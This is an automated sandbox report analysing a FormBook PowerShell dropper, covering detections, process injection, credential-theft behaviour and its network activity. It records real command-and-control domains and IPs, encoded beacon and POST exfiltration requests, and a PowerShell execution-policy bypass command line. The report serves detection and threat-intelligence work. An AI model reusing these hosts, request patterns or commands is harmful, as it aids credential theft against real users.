Edit tour

Windows Analysis Report
done1.ps1

Overview

General Information

Sample name:	done1.ps1
Analysis ID:	1665346
MD5:	5d9e8778c3de109c6b358eff8224cc46
SHA1:	e47e5c654a69fc71b130d10f346c0dd241cd5cb7
SHA256:	7236ddbaadd65584a40640083c204ec297d24551461ac57a65f569374f448726
Tags:	ps1user-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for dropped file

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected FormBook

Yara detected Powershell decode and execute

Allocates memory in foreign processes

Found direct / indirect Syscall (likely to bypass EDR)

Found suspicious powershell code related to unpacking or dynamic code loading

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

PE file contains section with special chars

PE file has nameless sections

Performs DNS queries to domains with low reputation

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious execution chain found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses ipconfig to lookup or modify the Windows network settings

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7068 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\done1.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

aUwuTvOs.exe (PID: 6680 cmdline: "C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe" MD5: 303086B7C13576299B561C436CC81603)

RegAsm.exe (PID: 5356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

z3FgtAArgRVFoLlwLoetbjM.exe (PID: 5232 cmdline: "C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\ZluVMrKZA.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

ipconfig.exe (PID: 2020 cmdline: "C:\Windows\SysWOW64\ipconfig.exe" MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)

z3FgtAArgRVFoLlwLoetbjM.exe (PID: 3732 cmdline: "C:\Program Files (x86)\yQhGPhlFePwiaACighsLAEQaMbkloBjBTjhhwOPijvDHWovUmShEWhkrhOHFLKArQlIQVmDY\HTpwfAK3bN.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 6048 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

svchost.exe (PID: 5180 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
done1.ps1	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.3288857339.0000000002B20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1311351646.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1310421003.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3288971059.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000007.00000002.3286966765.0000000002680000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.1313188653.0000000003390000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3289053640.0000000002650000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: powershell.exe PID: 7068	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x26cfd3:$b1: ::WriteAllBytes( 0x2e0830:$b1: ::WriteAllBytes( 0x354076:$b1: ::WriteAllBytes( 0x4e6b2e:$b1: ::WriteAllBytes( 0x75d1b8:$b1: ::WriteAllBytes( 0x19b53f:$b2: ::FromBase64String( 0x19b657:$b2: ::FromBase64String( 0x26cff6:$b2: ::FromBase64String( 0x2e0853:$b2: ::FromBase64String( 0x354099:$b2: ::FromBase64String( 0x4e6b51:$b2: ::FromBase64String( 0x75d1db:$b2: ::FromBase64String( 0x19b525:$b3: ::UTF8.GetString( 0x19b869:$b3: ::UTF8.GetString( 0x5f5be:$s1: -join 0x6093c:$s1: -join 0x26cf7a:$s1: -join 0x490dc2:$s1: -join 0x49de97:$s1: -join 0x4a1269:$s1: -join 0x4a191b:$s1: -join
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
3.2.RegAsm.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_7068.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\done1.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\done1.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5680, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\done1.ps1", ProcessId: 7068, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\done1.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\done1.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 5680, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\done1.ps1", ProcessId: 7068, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 628, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5180, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe

Avira: detection malicious, Label: TR/Dropper.Gen

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\aUwuTvOs.exe

ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: done1.ps1	Virustotal: Detection: 37%			Perma Link
Source: done1.ps1	ReversingLabs: Detection: 33%

Yara detected FormBook

Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3288857339.0000000002B20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1311351646.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1310421003.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3288971059.0000000002BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3286966765.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1313188653.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.3289053640.0000000002650000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Neural Call Log Analysis: 99.3%

Source:	Binary string: ipconfig.pdb source: z3FgtAArgRVFoLlwLoetbjM.exe, 00000006.00000003.1250105275.0000000000934000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: z3FgtAArgRVFoLlwLoetbjM.exe, 00000006.00000003.1250105275.0000000000934000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegAsm.exe, 00000003.00000002.1311587482.0000000003040000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3289265099.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1310789575.0000000002BB4000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3289265099.00000000030AE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1312928171.0000000002D68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb source: ipconfig.exe, 00000007.00000002.3287297366.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3289845544.000000000353C000.00000004.10000000.00040000.00000000.sdmp, z3FgtAArgRVFoLlwLoetbjM.exe, 0000000E.00000000.1378417111.000000000286C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1611098718.000000002FC9C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 00000003.00000002.1311587482.0000000003040000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000007.00000002.3289265099.0000000002F10000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1310789575.0000000002BB4000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3289265099.00000000030AE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1312928171.0000000002D68000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegAsm.pdb4 source: ipconfig.exe, 00000007.00000002.3287297366.00000000028CF000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3289845544.000000000353C000.00000004.10000000.00040000.00000000.sdmp, z3FgtAArgRVFoLlwLoetbjM.exe, 0000000E.00000000.1378417111.000000000286C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.1611098718.000000002FC9C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: z3FgtAArgRVFoLlwLoetbjM.exe, 00000006.00000002.3286976809.000000000013F000.00000002.00000001.01000000.0000000A.sdmp, z3FgtAArgRVFoLlwLoetbjM.exe, 0000000E.00000002.3286964251.000000000013F000.00000002.00000001.01000000.0000000A.sdmp

Source: C:\Windows\SysWOW64\ipconfig.exe

Code function: 7_2_0269C6A0 FindFirstFileW,FindNextFileW,FindClose,

7_2_0269C6A0

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then xor eax, eax		7_2_02689E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 4x nop then mov ebx, 00000004h		7_2_02CB04DE

Networking

Performs DNS queries to domains with low reputation

Source:	DNS query: www.031234352.xyz
Source:	DNS query: www.nohuz68w.xyz

Source: Joe Sandbox View	IP Address: 63.141.128.3 63.141.128.3
Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 199.192.23.195 199.192.23.195

Source: Joe Sandbox View

ASN Name: HETZNER-ASDE HETZNER-ASDE

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /zt2z/?E8z8gxs=LKx+AUxwYzBy7gbrd21x1FmXRl2dI7NG+t9LHthk2jI9sxfc/+Pgyj88A8qayUOiS6kBq6UJR3bHIKa/32YpucxPwef5E6OEGwtgv6AAwsbp9bKtfObC2XTPBlfvTij3Kg==&9Pv=ZdtDKjcxhBXpYf0p HTTP/1.1Host: www.roastroots.lolAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /pg3s/?E8z8gxs=vOJZI9yY5VvVQmr7CJW7MREjRlPiV7JJxX8uoXSBHnMCnUGebIgImJbVduskDKCy8oe1PdwJcRQ9rZzziooQK6NKJWSQmEnFm1S2gWQlyc0qTI7ULQgzDTFD7rqD02s/VQ==&9Pv=ZdtDKjcxhBXpYf0p HTTP/1.1Host: www.notary.runAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /y3n2/?E8z8gxs=vYAMCMidVaVxxh9mmLWvsu30kgS1ZK9GZG5eHdj7wKA9OWGj7zlCsTvNPRQPjGZJNIQIHESZ58j13cnhZpmMLDiLAax7fJoyDZ+xDRh9VOYWZKQycIiYuPqmskNzkX+PGA==&9Pv=ZdtDKjcxhBXpYf0p HTTP/1.1Host: www.sidd.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /q2xw/?E8z8gxs=15Gtp7LARpLkoK5DJR0Mt5z17ZiWNbMYjPbCI8andccp0Q9jonZuAf6DNXqCKgDuUEhANxqn2Y+OBEJiq9TPVJdSeMNsw19j6xfiXOZHgFTQSOGFNPuKtoRODdMjjfTlTQ==&9Pv=ZdtDKjcxhBXpYf0p HTTP/1.1Host: www.bigcommerce.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /1jgm/?9Pv=ZdtDKjcxhBXpYf0p&E8z8gxs=vo0VOv0kFMGeRk4Nh1dz/OAo/uWIN8nIgrnCEX4ZMk40TIVwbCDK4gFbZ675pVIMbMggnNWj+JEklWmX2CLdWRuFLbAJ8wy7YUUTKzhw8MLUrpL5hSScYkS21bBNvWGv4w== HTTP/1.1Host: www.031234352.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /bndo/?E8z8gxs=cGH1Z3Y+3vt9xRUF2sQggkWbnGqX5VDZwUd5xXuW/JhwpJXiyJX7qEG/rgoUqFHNRMhFq6QLWcxbRZl8X7E3HVw89m2oXRY1/S+C8Q48tTRATZ/hmHcveBgihr07ipKkBg==&9Pv=ZdtDKjcxhBXpYf0p HTTP/1.1Host: www.chillrocket.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /dcuq/?E8z8gxs=Vr0Lpj0gKxESkoW4wVYSl49d+1CFUK9Bfdjw3LFsKhiHHHzOOkEQw2rPqd3j+1Ymt4p0j/PiwSgG10dWC08wYeQWra1YDZ7ifEPZYDKyt4khjdMKOBLaLBZDGsiQQOie3w==&9Pv=ZdtDKjcxhBXpYf0p HTTP/1.1Host: www.fabric.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /c3po/?E8z8gxs=+2ahFXXkmVgFx48HvZrH+n3uszHAw3HVLImeKx6uMQ6ftTLXj3cneDEnLggd8BE+1fbDPe1qSJDPkEIa55oBjwKusXyRpmw9/edjgjzjxjFc5CytTMk4Eq8uEgAzbV86fA==&9Pv=ZdtDKjcxhBXpYf0p HTTP/1.1Host: www.nohuz68w.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /4pdf/?E8z8gxs=RzQdD+ReSCNFVgaHUgIop8YZ5QP0OnZCbmj8JY6WYawtM8T7qthxUowzLbQ+m3WHq7Ljzo6uKBHRcsp00OeOoxoFZ2T65hlzfHf0RQFnMx58pn7Vcfzz+a8zapfDmlpYaQ==&9Pv=ZdtDKjcxhBXpYf0p HTTP/1.1Host: www.curiosa.newsAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /0vny/?9Pv=ZdtDKjcxhBXpYf0p&E8z8gxs=cO66eXHGPCrxhnGLwEw+RpxGwtBOpXsiSXODprfcwF1vxwpzhSAKOYvVSlswVH5pNrY4Ay4mkvgfGAhYsb+xkXl9tk8w/LNnc5DkU+ie7pyLDXPipdpf+/t1084fG1aoeQ== HTTP/1.1Host: www.thrustaviation.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /2inw/?E8z8gxs=D7XKxB4ks3oUqcMR7Dm5fbU4EcEH3x6Bl2umQREpL6RVD39NyxgV3+w2fVa6bjKfz5f4Kiq6QuEc8a73Ghy8epts4P+l4RwCWSE4lgWQn7aiOcExtNAAP2xNYa3EzjdvEw==&9Pv=ZdtDKjcxhBXpYf0p HTTP/1.1Host: www.99fxz.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; MASMJS; rv:11.0) like Gecko

Source: global traffic	DNS traffic detected: DNS query: www.roastroots.lol
Source: global traffic	DNS traffic detected: DNS query: www.notary.run
Source: global traffic	DNS traffic detected: DNS query: www.sidd.fun
Source: global traffic	DNS traffic detected: DNS query: www.bigcommerce.com
Source: global traffic	DNS traffic detected: DNS query: www.031234352.xyz
Source: global traffic	DNS traffic detected: DNS query: www.soyuz-zoloto.online
Source: global traffic	DNS traffic detected: DNS query: www.chillrocket.top
Source: global traffic	DNS traffic detected: DNS query: www.fabric.com
Source: global traffic	DNS traffic detected: DNS query: www.nohuz68w.xyz
Source: global traffic	DNS traffic detected: DNS query: www.curiosa.news
Source: global traffic	DNS traffic detected: DNS query: www.thrustaviation.info
Source: global traffic	DNS traffic detected: DNS query: www.99fxz.net

Source: unknown

HTTP traffic detected: POST /pg3s/ HTTP/1.1Host: www.notary.runAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usCache-Control: no-cacheContent-Length: 208Connection: closeContent-Type: application/x-www-form-urlencodedOrigin: http://www.notary.runReferer: http://www.notary.run/pg3s/User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; Touch; MASMJS; rv:11.0) like GeckoData Raw: 45 38 7a 38 67 78 73 3d 69 4d 68 35 4c 4e 4b 74 77 58 37 36 52 57 6a 6d 4d 35 61 54 43 54 51 42 49 55 62 41 65 36 77 70 37 6e 73 30 69 47 48 2b 4f 47 73 69 68 6d 2b 48 5a 36 6b 4a 71 71 62 39 53 2b 49 6d 4e 49 53 78 6c 50 47 52 48 2f 73 77 57 79 55 41 6a 35 2f 77 69 39 41 74 61 34 4e 57 50 58 2b 4a 79 45 37 4f 76 43 71 53 68 41 34 63 78 6f 4d 4c 51 2b 6e 36 45 30 68 57 42 52 4e 6b 2b 6f 79 63 2b 58 6c 54 55 48 78 4b 74 4b 4d 6c 52 48 4e 6c 6a 33 7a 2b 68 43 67 48 32 64 6a 30 43 61 54 38 38 65 4c 37 43 44 75 30 63 4a 35 75 59 78 79 71 74 56 78 79 49 70 30 74 79 6d 46 7a 33 42 37 54 57 4c 6b 36 6b 61 68 30 6a 58 51 3d Data Ascii: E8z8gxs=iMh5LNKtwX76RWjmM5aTCTQBIUbAe6wp7ns0iGH+OGsihm+HZ6kJqqb9S+ImNISxlPGRH/swWyUAj5/wi9Ata4NWPX+JyE7OvCqShA4cxoMLQ+n6E0hWBRNk+oyc+XlTUHxKtKMlRHNlj3z+hCgH2dj0CaT88eL7CDu0cJ5uYxyqtVxyIp0tymFz3B7TWLk6kah0jXQ=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 11:56:56 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 11:56:59 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
